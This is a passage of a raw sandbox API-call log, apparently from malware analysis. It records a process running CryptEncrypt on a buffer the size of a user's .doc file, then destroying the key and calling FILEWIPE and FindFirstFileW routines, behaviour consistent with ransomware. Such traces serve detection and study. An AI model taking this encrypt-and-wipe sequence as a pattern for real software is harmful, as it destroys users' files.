1 [0034.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.130] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0034.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0034.130] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.130] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0034.130] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.130] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.130] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.131] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0034.131] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.131] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0034.131] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.131] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.131] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.131] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.131] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.131] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0034.131] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.132] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.132] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xbd3b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xbd40) returned 1 [0034.132] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.132] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.132] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.132] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.132] CharLowerBuffW (in: lpsz="byte[48449]", cchLength=0xb | out: lpsz="byte[48449]") returned 0xb [0034.132] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.134] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.134] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.134] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.135] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.135] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9787f0*, pdwDataLen=0x6ae220*=0xbd3b, dwBufLen=0xbd40 | out: pbData=0x9787f0*, pdwDataLen=0x6ae220*=0xbd40) returned 1 [0034.136] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.136] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.136] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.138] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.138] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.138] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0034.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.138] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.138] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.138] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.138] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0034.138] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.138] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.138] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.138] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.138] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0034.138] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.161] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.161] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.161] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.163] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.163] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.163] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0034.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.163] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.163] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0034.163] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.163] CryptDestroyKey (hKey=0x7c2280) returned 1 [0034.164] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.164] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.164] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0034.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.164] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.164] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.164] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0034.164] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0034.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0034.164] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.164] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.164] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0034.164] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0034.164] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0034.164] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.164] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.164] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.164] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0034.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.165] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.165] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.165] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.165] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0034.165] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.165] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0034.165] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0034.165] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.165] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0034.165] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.165] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0034.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0034.165] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.165] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.165] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0034.165] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.165] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.166] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.166] FreeLibrary (hLibModule=0x754b0000) returned 1 [0034.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0034.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0034.166] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0034.166] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0034.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.166] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.168] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.168] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.169] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.169] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0034.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0034.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.169] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.170] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.170] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687e6f0, ftCreationTime.dwHighDateTime=0x1d5c14d, ftLastAccessTime.dwLowDateTime=0x802a9bb0, ftLastAccessTime.dwHighDateTime=0x1d5c300, ftLastWriteTime.dwLowDateTime=0x802a9bb0, ftLastWriteTime.dwHighDateTime=0x1d5c300, nFileSizeHigh=0x0, nFileSizeLow=0xbd3b, dwReserved0=0x0, dwReserved1=0x777648, cFileName="G_eLJ7pQzi27.doc", cAlternateFileName="G_ELJ7~1.DOC")) returned 0x7c2100 [0034.170] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0034.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0034.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0034.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.170] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.170] CharLowerBuffW (in: lpsz="byte[48443]", cchLength=0xb | out: lpsz="byte[48443]") returned 0xb [0034.171] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.171] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0034.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.171] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.171] CharLowerBuffW (in: 